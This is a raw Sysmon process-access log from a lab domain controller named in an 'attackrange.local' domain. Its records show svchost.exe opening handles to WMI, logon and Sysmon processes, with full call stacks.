12:02:09.692{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003985Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.692{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003984Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.692{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003983Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.692{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003982Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.676{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003981Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.676{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003980Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.676{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003979Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.676{266CAFBE-646C-6064-1000-00000000AE01}11242372C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003978Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.676{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003977Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.676{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003976Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.676{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003975Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.676{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003974Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.676{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003973Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.676{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003972Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.676{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003971Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.676{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003970Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.676{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003969Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.661{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003968Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.661{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003967Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.661{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003966Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.661{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003965Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.661{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003964Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.661{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003963Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.661{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003962Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.661{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003961Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 